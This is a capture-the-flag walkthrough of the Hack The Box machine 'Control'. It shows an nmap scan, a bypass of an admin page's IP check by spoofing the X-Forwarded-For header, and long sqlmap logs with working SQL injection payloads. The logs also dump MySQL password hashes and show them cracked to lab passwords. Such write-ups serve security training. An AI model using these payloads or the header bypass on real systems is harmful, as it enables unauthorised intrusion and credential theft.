Hack The Box - Control

1. Intro

HackTheBox Control (10.10.10.167) is a Windows box released on the 23 Nov 2019. The box is based around performing Kerberos attacks on Domain Controllers.

2. The Setup

Vulnerable Machine Name:    Control
Vulnerable Machine Network: 10.10.10.167

Attacker Machine:           Kali Linux 2020.1 (Running on vmware)
Atter Machine VM:           VMWare
Attacker Machine IP:        10.10.15.124

Note The attacker IP address changed a number of times throughout this tutorial due to VPN issues.

3. Scanning

We begin by trying to enumerate any open ports and services running on our target. To do this we use nmap with the following command:

nmap -sV -A -p- -Pn -T4 -v 10.10.10.167

# Command breaks down as follows

-sV             # Service Scan TCP
-A              # OS and version detection + traceroute and scripts
-T4             # T4 Timing
-Pn             # Disable ping
-p-             # Scan all ports
10.10.10.167    # IP Control

Nmap scan report for 10.10.10.167
Host is up (0.023s latency).
Not shown: 65530 filtered ports
PORT      STATE SERVICE VERSION
80/tcp    open  http    Microsoft IIS httpd 10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST                                                                                                                                                              
|_  Potentially risky methods: TRACE                                                                                                                                                                            
|_http-server-header: Microsoft-IIS/10.0                                                                                                                                                                        
|_http-title: Fidelity                                                                                                                                                                                          
135/tcp   open  msrpc   Microsoft Windows RPC                                                                                                                                                                   
3306/tcp  open  mysql?                                                                                                                                                                                          
| fingerprint-strings:                                                                                                                                                                                          
|   FourOhFourRequest, GetRequest, HTTPOptions, NULL, WMSRequest, giop:                                                                                                                                         
|_    Host '10.10.15.124' is not allowed to connect to this MariaDB server                                                                                                                                      
49666/tcp open  msrpc   Microsoft Windows RPC
49667/tcp open  msrpc   Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.80%I=7%D=3/3%Time=5E5E4597%P=x86_64-pc-linux-gnu%r(NUL
SF:L,4B,"G\0\0\x01\xffj\x04Host\x20'10\.10\.15\.124'\x20is\x20not\x20allow
SF:ed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(GetRequest,4
SF:B,"G\0\0\x01\xffj\x04Host\x20'10\.10\.15\.124'\x20is\x20not\x20allowed\
SF:x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(HTTPOptions,4B,
SF:"G\0\0\x01\xffj\x04Host\x20'10\.10\.15\.124'\x20is\x20not\x20allowed\x2
SF:0to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(FourOhFourRequest
SF:,4B,"G\0\0\x01\xffj\x04Host\x20'10\.10\.15\.124'\x20is\x20not\x20allowe
SF:d\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(WMSRequest,4B
SF:,"G\0\0\x01\xffj\x04Host\x20'10\.10\.15\.124'\x20is\x20not\x20allowed\x
SF:20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(giop,4B,"G\0\0\x
SF:01\xffj\x04Host\x20'10\.10\.15\.124'\x20is\x20not\x20allowed\x20to\x20c
SF:onnect\x20to\x20this\x20MariaDB\x20server");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

NSE: Script Post-scanning.
Initiating NSE at 11:56
Completed NSE at 11:56, 0.00s elapsed
Initiating NSE at 11:56
Completed NSE at 11:56, 0.00s elapsed
Initiating NSE at 11:56
Completed NSE at 11:56, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 176.76 seconds

4. Service Enumeration

From our nmap scan we can see that there is not a lot running on this host outside of services on ports 80 and 135.

4.1 Samba (SMB)

We start our enumeration phase with Enum4Linux using the following command: enum4linux 10.10.10.167

After numerous attempts it became apparent that this was going to get us nowhere.

4.2 Webserver

Navigating the webpage on http://10.10.10.167 we are met with the following error when trying to access the admin page.

After performing some manual enumeration a comment was discovered that appeared to leak an internal IP address as shown in Figure 8.

5. Bypass IP blocks with the X-Forwarded-For header

It is well known that some web applications restrict access based on IP address of the visitor. This is particularly common for administrator interfaces in an attempt to restrict this interface to the IP addresses that are known to be used by actual administrators. It was discovered that it was possible to bypass the restriction on the admin page by spoofing the "X-Forwarded-For" HTTP header and set the IP address to the one found in Figure 8. The following outlines how this was done:

Firstly we setup a rule using the Burp extension "Add Custom Header" to add the "X-Forwarded-For" header to every request we make like so:

Next we go to our Project Options and add a new Session Handling Rule like so:

This successfully allowed us to bypass the IP restriction and access the Admin page.

6. SQL Injection

It was discovered that an SQL injection vulnerability exists in the admin page which resulted ultimately resulted in a low privilege shell. The following how this was done:

Firstly navigate to any product and select view like so:

Copy the request from Burp to a txt file and modify it as shown to include the url:

POST http://10.10.10.167/view_product.php HTTP/1.1

Host: 10.10.10.167

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: http://10.10.10.167/admin.php

Content-Type: application/x-www-form-urlencoded

Content-Length: 12

Connection: close

Upgrade-Insecure-Requests: 1

X-Forwarded-For: 192.168.4.28



productId=32

Next using we can use SQLMAP to enumerate the databases by issuing the following command : sqlmap -r captured_request.txt --dbs

        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.4.2#stable}
|_ -| . [)]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 12:37:34 /2020-03-03/

[12:37:34] [INFO] parsing HTTP request from '/home/johnd/Hack The Box/Control/POST.txt'
[12:37:34] [INFO] testing connection to the target URL
[12:37:34] [INFO] checking if the target is protected by some kind of WAF/IPS
[12:37:34] [INFO] testing if the target URL content is stable
[12:37:35] [INFO] target URL content is stable
[12:37:35] [INFO] testing if POST parameter 'productId' is dynamic
[12:37:35] [WARNING] POST parameter 'productId' does not appear to be dynamic
[12:37:35] [WARNING] heuristic (basic) test shows that POST parameter 'productId' might not be injectable
[12:37:35] [INFO] testing for SQL injection on POST parameter 'productId'
[12:37:35] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:37:45] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[12:37:46] [INFO] POST parameter 'productId' appears to be 'Boolean-based blind - Parameter replace (original value)' injectable (with --code=200)
[12:37:47] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'MySQL' 
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] 
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] 
[12:38:15] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[12:38:15] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[12:38:15] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[12:38:15] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[12:38:15] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[12:38:15] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[12:38:15] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[12:38:15] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[12:38:15] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[12:38:15] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[12:38:15] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[12:38:15] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[12:38:15] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[12:38:15] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[12:38:16] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[12:38:16] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[12:38:16] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[12:38:16] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[12:38:16] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[12:38:16] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[12:38:16] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[12:38:16] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[12:38:16] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (BIGINT UNSIGNED)'
[12:38:16] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (EXP)'
[12:38:16] [INFO] testing 'MySQL >= 5.7.8 error-based - ORDER BY, GROUP BY clause (JSON_KEYS)'
[12:38:16] [INFO] testing 'MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[12:38:16] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)'
[12:38:16] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (UPDATEXML)'
[12:38:16] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[12:38:16] [INFO] testing 'MySQL inline queries'
[12:38:16] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[12:38:16] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[12:38:22] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[12:38:27] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[12:38:32] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[12:38:37] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[12:38:38] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[12:38:39] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[12:38:45] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP)'
[12:38:50] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
[12:38:50] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP)'
[12:38:50] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)'
[12:38:50] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP - comment)'
[12:38:50] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'
[12:38:55] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP - comment)'
[12:39:00] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query)'
[12:39:24] [INFO] POST parameter 'productId' appears to be 'MySQL < 5.0.12 AND time-based blind (heavy query)' injectable 
[12:39:24] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[12:39:24] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[12:39:24] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[12:39:24] [INFO] target URL appears to have 1 column in query
[12:39:24] [INFO] POST parameter 'productId' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
POST parameter 'productId' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
sqlmap identified the following injection point(s) with a total of 89 HTTP(s) requests:
---
Parameter: productId (POST)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: productId=(SELECT (CASE WHEN (4037=4037) THEN 32 ELSE (SELECT 3212 UNION SELECT 8438) END))

    Type: time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: productId=32 AND 5950=BENCHMARK(5000000,MD5(0x594d4754))

    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: productId=32 UNION ALL SELECT CONCAT(0x716b626271,0x765265686c4f5845637852747149506857686c6e6149577242414d4b496d6177654e554d53766353,0x717a767671)-- WMEo
---
[12:39:30] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL < 5.0.12 (MariaDB fork)
[12:39:30] [INFO] fetching database names
available databases [3]:
[*] information_schema
[*] mysql
[*] warehouse

[12:39:30] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 44 times
[12:39:30] [INFO] fetched data logged to text files under '/home/johnd/.sqlmap/output/10.10.10.167'

[*] ending @ 12:39:30 /2020-03-03/

We can see that there are three databases:

information_schema
mysql
warehouse

Focusing on the mysql database we attempt to retrieve a list of tables:

sqlmap -r captured_request.txt -D mysql --tables

        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.4.2#stable}
|_ -| . ["]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 12:48:28 /2020-03-03/

[12:48:28] [INFO] parsing HTTP request from '/home/johnd/Hack The Box/Control/POST.txt'
[12:48:28] [INFO] resuming back-end DBMS 'mysql' 
[12:48:28] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: productId (POST)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: productId=(SELECT (CASE WHEN (4037=4037) THEN 32 ELSE (SELECT 3212 UNION SELECT 8438) END))

    Type: time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: productId=32 AND 5950=BENCHMARK(5000000,MD5(0x594d4754))

    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: productId=32 UNION ALL SELECT CONCAT(0x716b626271,0x765265686c4f5845637852747149506857686c6e6149577242414d4b496d6177654e554d53766353,0x717a767671)-- WMEo
---
[12:48:29] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL < 5.0.12 (MariaDB fork)
[12:48:29] [INFO] fetching tables for database: 'mysql'
Database: mysql
[31 tables]
+---------------------------+
| user                      |
| column_stats              |
| columns_priv              |
| db                        |
| event                     |
| func                      |
| general_log               |
| global_priv               |
| gtid_slave_pos            |
| help_category             |
| help_keyword              |
| help_relation             |
| help_topic                |
| index_stats               |
| innodb_index_stats        |
| innodb_table_stats        |
| plugin                    |
| proc                      |
| procs_priv                |
| proxies_priv              |
| roles_mapping             |
| servers                   |
| slow_log                  |
| table_stats               |
| tables_priv               |
| time_zone                 |
| time_zone_leap_second     |
| time_zone_name            |
| time_zone_transition      |
| time_zone_transition_type |
| transaction_registry      |
+---------------------------+

[12:48:29] [INFO] fetched data logged to text files under '/home/johnd/.sqlmap/output/10.10.10.167'

[*] ending @ 12:48:29 /2020-03-03/

Reviewing the output we next try to enumerate the columns in the users table.

sqlmap -r captured_request.txt -D mysql -T user --columns

        ___
       __H__                                                                                                                                                                                                                               
 ___ ___[)]_____ ___ ___  {1.4.2#stable}                                                                                                                                                                                                   
|_ -| . ["]     | .'| . |                                                                                                                                                                                                                  
|___|_  [']_|_|_|__,|  _|                                                                                                                                                                                                                  
      |_|V...       |_|   http://sqlmap.org                                                                                                                                                                                                

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 09:51:42 /2020-03-05/

[09:51:42] [INFO] parsing HTTP request from '/home/johnd/Hack The Box/Control/POST.txt'
[09:51:42] [INFO] resuming back-end DBMS 'mysql' 
[09:51:42] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: productId (POST)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: productId=(SELECT (CASE WHEN (1384=1384) THEN 32 ELSE (SELECT 4857 UNION SELECT 9781) END))

    Type: stacked queries
    Title: MySQL >= 5.0.12 stacked queries (comment)
    Payload: productId=32;SELECT SLEEP(5)#

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: productId=32 AND (SELECT 4677 FROM (SELECT(SLEEP(5)))mAOG)

    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: productId=32 UNION ALL SELECT CONCAT(0x716b627171,0x6c7645426a66427172634645774268444b5652747756476567494a7859576269464d644c6c547250,0x7162627671)-- dhsC
---
[09:51:42] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[09:51:42] [INFO] fetching columns for table 'user' in database 'mysql'
Database: mysql
Table: user
[47 columns]
+------------------------+---------------------+
| Column                 | Type                |
+------------------------+---------------------+
| User                   | char(80)            |
| Alter_priv             | varchar(1)          |
| Alter_routine_priv     | varchar(1)          |
| authentication_string  | longtext            |
| Create_priv            | varchar(1)          |
| Create_routine_priv    | varchar(1)          |
| Create_tablespace_priv | varchar(1)          |
| Create_tmp_table_priv  | varchar(1)          |
| Create_user_priv       | varchar(1)          |
| Create_view_priv       | varchar(1)          |
| default_role           | longtext            |
| Delete_history_priv    | varchar(1)          |
| Delete_priv            | varchar(1)          |
| Drop_priv              | varchar(1)          |
| Event_priv             | varchar(1)          |
| Execute_priv           | varchar(1)          |
| File_priv              | varchar(1)          |
| Grant_priv             | varchar(1)          |
| Host                   | char(60)            |
| Index_priv             | varchar(1)          |
| Insert_priv            | varchar(1)          |
| is_role                | varchar(1)          |
| Lock_tables_priv       | varchar(1)          |
| max_connections        | bigint(20) unsigned |
| max_questions          | bigint(20) unsigned |
| max_statement_time     | decimal(12,6)       |
| max_updates            | bigint(20) unsigned |
| max_user_connections   | bigint(21)          |
| Password               | longtext            |
| password_expired       | varchar(1)          |
| plugin                 | longtext            |
| Process_priv           | varchar(1)          |
| References_priv        | varchar(1)          |
| Reload_priv            | varchar(1)          |
| Repl_client_priv       | varchar(1)          |
| Repl_slave_priv        | varchar(1)          |
| Select_priv            | varchar(1)          |
| Show_db_priv           | varchar(1)          |
| Show_view_priv         | varchar(1)          |
| Shutdown_priv          | varchar(1)          |
| ssl_cipher             | longtext            |
| ssl_type               | varchar(9)          |
| Super_priv             | varchar(1)          |
| Trigger_priv           | varchar(1)          |
| Update_priv            | varchar(1)          |
| x509_issuer            | longtext            |
| x509_subject           | longtext            |
+------------------------+---------------------+

[09:51:42] [INFO] fetched data logged to text files under '/home/johnd/.sqlmap/output/10.10.10.167'

Next we grab the password hashes for all the users using the following command:

sqlmap -r captured_request.txt -D mysql -T user -C user,Password --dump

        ___
       __H__                                                                                                                                                                                                                               
 ___ ___["]_____ ___ ___  {1.4.2#stable}                                                                                                                                                                                                   
|_ -| . [)]     | .'| . |                                                                                                                                                                                                                  
|___|_  [,]_|_|_|__,|  _|                                                                                                                                                                                                                  
      |_|V...       |_|   http://sqlmap.org                                                                                                                                                                                                

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 09:54:03 /2020-03-05/

[09:54:03] [INFO] parsing HTTP request from '/home/johnd/Hack The Box/Control/POST.txt'
[09:54:03] [INFO] resuming back-end DBMS 'mysql' 
[09:54:03] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: productId (POST)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: productId=(SELECT (CASE WHEN (1384=1384) THEN 32 ELSE (SELECT 4857 UNION SELECT 9781) END))

    Type: stacked queries
    Title: MySQL >= 5.0.12 stacked queries (comment)
    Payload: productId=32;SELECT SLEEP(5)#

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: productId=32 AND (SELECT 4677 FROM (SELECT(SLEEP(5)))mAOG)

    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: productId=32 UNION ALL SELECT CONCAT(0x716b627171,0x6c7645426a66427172634645774268444b5652747756476567494a7859576269464d644c6c547250,0x7162627671)-- dhsC
---
[09:54:03] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[09:54:03] [INFO] fetching entries of column(s) 'Password, `user`' for table 'user' in database 'mysql'
[09:54:03] [WARNING] something went wrong with full UNION technique (could be because of limitation on retrieved number of entries). Falling back to partial UNION technique
[09:54:03] [INFO] retrieved: '*0E178792E8FC304A2E3133D535D38CAF1DA3CD9D','hector'
[09:54:03] [INFO] retrieved: '*CFE3EEE434B38CBF709AD67A4DCDEA476CBA7FDA','manager'
[09:54:03] [INFO] retrieved: '*0A4A5CAD344718DC418035A1F4D292BA603134D8','root'
[09:54:03] [INFO] retrieved: '*0A4A5CAD344718DC418035A1F4D292BA603134D8','root'
[09:54:04] [INFO] retrieved: '*0A4A5CAD344718DC418035A1F4D292BA603134D8','root'
[09:54:04] [INFO] retrieved: '*0A4A5CAD344718DC418035A1F4D292BA603134D8','root'
[09:54:04] [INFO] recognized possible password hashes in column 'Password'                                                                                                                                                                
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] 
do you want to crack them via a dictionary-based attack? [Y/n/q] 
[09:54:05] [INFO] using hash method 'mysql_passwd'
[09:54:05] [INFO] resuming password 'l3tm3!n' for hash '*cfe3eee434b38cbf709ad67a4dcdea476cba7fda'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 
[09:54:06] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] 
[09:54:06] [INFO] starting dictionary-based cracking (mysql_passwd)
[09:54:06] [INFO] starting 4 processes 
[09:54:07] [INFO] current status: 212  ... /
Database: mysql                                                                                                                                                                                                                           
Table: user
[6 entries]
+---------+-----------------------------------------------------+
| user    | Password                                            |
+---------+-----------------------------------------------------+
| hector  | *0E178792E8FC304A2E3133D535D38CAF1DA3CD9D           |
| manager | *CFE3EEE434B38CBF709AD67A4DCDEA476CBA7FDA (l3tm3!n) |
| root    | *0A4A5CAD344718DC418035A1F4D292BA603134D8           |
| root    | *0A4A5CAD344718DC418035A1F4D292BA603134D8           |
| root    | *0A4A5CAD344718DC418035A1F4D292BA603134D8           |
| root    | *0A4A5CAD344718DC418035A1F4D292BA603134D8           |
+---------+-----------------------------------------------------+

[09:54:14] [INFO] table 'mysql.`user`' dumped to CSV file '/home/johnd/.sqlmap/output/10.10.10.167/dump/mysql/user.csv'
[09:54:14] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1 times
[09:54:14] [INFO] fetched data logged to text files under '/home/johnd/.sqlmap/output/10.10.10.167'

[*] ending @ 09:54:14 /2020-03-05/

Reviewing the output we can see that we have successfully cracked the password for the manager account - l3tm3!n. Checking the remaining hashes on CrackStation.net gives us the plaintext - l33th4x0rhector for the account belonging to hector.

sqlmap -r '/home/johnd/Hack The Box/Control/captured_request.txt' --current-user --privileges
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.4.2#stable}
|_ -| . [(]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 10:10:05 /2020-03-05/

[10:10:05] [INFO] parsing HTTP request from '/home/johnd/Hack The Box/Control/captured_request.txt'
[10:10:05] [INFO] resuming back-end DBMS 'mysql' 
[10:10:05] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: productId (POST)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: productId=(SELECT (CASE WHEN (1384=1384) THEN 32 ELSE (SELECT 4857 UNION SELECT 9781) END))

    Type: stacked queries
    Title: MySQL >= 5.0.12 stacked queries (comment)
    Payload: productId=32;SELECT SLEEP(5)#

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: productId=32 AND (SELECT 4677 FROM (SELECT(SLEEP(5)))mAOG)

    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: productId=32 UNION ALL SELECT CONCAT(0x716b627171,0x6c7645426a66427172634645774268444b5652747756476567494a7859576269464d644c6c547250,0x7162627671)-- dhsC
---
[10:10:05] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[10:10:05] [INFO] fetching current user
current user: 'manager@localhost' <-------------------------------
[10:10:05] [INFO] fetching database users privileges
database management system users privileges:
[*] 'hector'@'localhost' (administrator) [29]:
    privilege: ALTER
    privilege: ALTER ROUTINE
    privilege: CREATE
    privilege: CREATE ROUTINE
    privilege: CREATE TABLESPACE
    privilege: CREATE TEMPORARY TABLES
    privilege: CREATE USER
    privilege: CREATE VIEW
    privilege: DELETE
    privilege: DELETE HISTORY
    privilege: DROP
    privilege: EVENT
    privilege: EXECUTE
    privilege: FILE
    privilege: INDEX
    privilege: INSERT
    privilege: LOCK TABLES
    privilege: PROCESS
    privilege: REFERENCES
    privilege: RELOAD
    privilege: REPLICATION CLIENT
    privilege: REPLICATION SLAVE
    privilege: SELECT
    privilege: SHOW DATABASES
    privilege: SHOW VIEW
    privilege: SHUTDOWN
    privilege: SUPER
    privilege: TRIGGER
    privilege: UPDATE
[*] 'manager'@'localhost' [1]:
    privilege: FILE            <-------------------------------
[*] 'root'@'127.0.0.1' (administrator) [29]:
    privilege: ALTER
    privilege: ALTER ROUTINE
    privilege: CREATE
    privilege: CREATE ROUTINE
    privilege: CREATE TABLESPACE
    privilege: CREATE TEMPORARY TABLES
    privilege: CREATE USER
    privilege: CREATE VIEW
    privilege: DELETE
    privilege: DELETE HISTORY
    privilege: DROP
    privilege: EVENT
    privilege: EXECUTE
    privilege: FILE
    privilege: INDEX
    privilege: INSERT
    privilege: LOCK TABLES
    privilege: PROCESS
    privilege: REFERENCES
    privilege: RELOAD
    privilege: REPLICATION CLIENT
    privilege: REPLICATION SLAVE
    privilege: SELECT
    privilege: SHOW DATABASES
    privilege: SHOW VIEW
    privilege: SHUTDOWN
    privilege: SUPER
    privilege: TRIGGER
    privilege: UPDATE
[*] 'root'@'::1' (administrator) [29]:
    privilege: ALTER
    privilege: ALTER ROUTINE
    privilege: CREATE
    privilege: CREATE ROUTINE
    privilege: CREATE TABLESPACE
    privilege: CREATE TEMPORARY TABLES
    privilege: CREATE USER
    privilege: CREATE VIEW
    privilege: DELETE
    privilege: DELETE HISTORY
    privilege: DROP
    privilege: EVENT
    privilege: EXECUTE
    privilege: FILE
    privilege: INDEX
    privilege: INSERT
    privilege: LOCK TABLES
    privilege: PROCESS
    privilege: REFERENCES
    privilege: RELOAD
    privilege: REPLICATION CLIENT
    privilege: REPLICATION SLAVE
    privilege: SELECT
    privilege: SHOW DATABASES
    privilege: SHOW VIEW
    privilege: SHUTDOWN
    privilege: SUPER
    privilege: TRIGGER
    privilege: UPDATE
[*] 'root'@'fidelity' (administrator) [29]:
    privilege: ALTER
    privilege: ALTER ROUTINE
    privilege: CREATE
    privilege: CREATE ROUTINE
    privilege: CREATE TABLESPACE
    privilege: CREATE TEMPORARY TABLES
    privilege: CREATE USER
    privilege: CREATE VIEW
    privilege: DELETE
    privilege: DELETE HISTORY
    privilege: DROP
    privilege: EVENT
    privilege: EXECUTE
    privilege: FILE
    privilege: INDEX
    privilege: INSERT
    privilege: LOCK TABLES
    privilege: PROCESS
    privilege: REFERENCES
    privilege: RELOAD
    privilege: REPLICATION CLIENT
    privilege: REPLICATION SLAVE
    privilege: SELECT
    privilege: SHOW DATABASES
    privilege: SHOW VIEW
    privilege: SHUTDOWN
    privilege: SUPER
    privilege: TRIGGER
    privilege: UPDATE
[*] 'root'@'localhost' (administrator) [29]:
    privilege: ALTER
    privilege: ALTER ROUTINE
    privilege: CREATE
    privilege: CREATE ROUTINE
    privilege: CREATE TABLESPACE
    privilege: CREATE TEMPORARY TABLES
    privilege: CREATE USER
    privilege: CREATE VIEW
    privilege: DELETE
    privilege: DELETE HISTORY
    privilege: DROP
    privilege: EVENT
    privilege: EXECUTE
    privilege: FILE
    privilege: INDEX
    privilege: INSERT
    privilege: LOCK TABLES
    privilege: PROCESS
    privilege: REFERENCES
    privilege: RELOAD
    privilege: REPLICATION CLIENT
    privilege: REPLICATION SLAVE
    privilege: SELECT
    privilege: SHOW DATABASES
    privilege: SHOW VIEW
    privilege: SHUTDOWN
    privilege: SUPER
    privilege: TRIGGER
    privilege: UPDATE

